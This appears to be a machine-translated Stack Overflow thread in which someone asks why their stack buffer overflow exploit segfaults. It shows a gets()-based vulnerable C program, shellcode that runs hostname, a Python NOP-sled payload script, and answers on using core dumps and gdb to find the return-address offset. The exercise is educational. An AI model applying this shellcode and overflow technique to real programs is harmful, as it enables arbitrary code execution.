無法運行堆棧緩沖區溢出漏洞利用

Question

我必須在以下緩沖區溢出程序中注入代碼。 該代碼應顯示主機名。 我有一個操作碼（ \\x31\\xc0\\x50\\x68\\x6e\\x61\\x6d\\x65\\x68\\x68\\x6f\\x73\\x74\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x50\\x54\\x53\\xb0\\x0b\\x50\\xcd\\x80 ）起作用。 我已經使用過NOP和重復的返回地址。 但是我無法使用它來運行代碼，並且總是會遇到分段錯誤。 誰可以幫我這個事？

脆弱的

#include <stdio.h>
#include <stdlib.h>

int
main(int argc, char * * argv)
{
  char * stuff = 0;
  int len = 0;
  vulnerable();
  return 0;
}

int
vulnerable(void)
{
  char buf[100];
  printf("enter your name: ");
  fflush(stdout);
  gets(buf);
  printf("\"%s\"\n Welcome", buf );
}

我用上面的程序編譯了

gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o vulnerable vulnerable.c

Shellcode.py

print "\x90"*51 +"\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2‌​f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80" + "\xd8\xf3\xff\xbf"*6 

我已經在命令行中通過以下方式調用了該python程序

python shellcode.py | ./vulnerable

Answer 1

我建議您打開核心轉儲：

ulimit -c unlimited

然后做一個簡單的緩沖區溢出，如perl -e 'print "A"x130' ，系統將生成轉儲：使用gdb -c core打開它，您將看到％eip = 0x41414141

然后，您可以減少注入的緩沖區，就像perl -e 'print "A"x120'直到獲得確切的緩沖區大小以覆蓋RET。

Answer 2

您能描述查找寄信人地址的步驟嗎？

c> shellcode.py >shellcode
c> gdb vulnerable
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(gdb) b vulnerable
Breakpoint 1 at 0x80484e6: file vulnerable.c, line 17.
(gdb) r <shellcode
Starting program: /home/armali/bin/so/c/vulnerable <shellcode

Breakpoint 1, vulnerable () at vulnerable.c:17
17        printf("enter your name: ");
(gdb) info frame
Stack level 0, frame at 0xbffff7bc:
 eip = 0x80484e6 in vulnerable (vulnerable.c:17); saved eip 0x80484c9
 called by frame at 0xbffff7cc
 source language c.
 Arglist at 0xbffff7bc, args: 
 Locals at 0xbffff7bc, Previous frame's sp is 0x0
 Saved registers:
  ebp at 0xbffff7bc, eip at 0xbffff7c0

該示例顯示返回地址eip 0x80484c9保存at 0xbffff7c0 。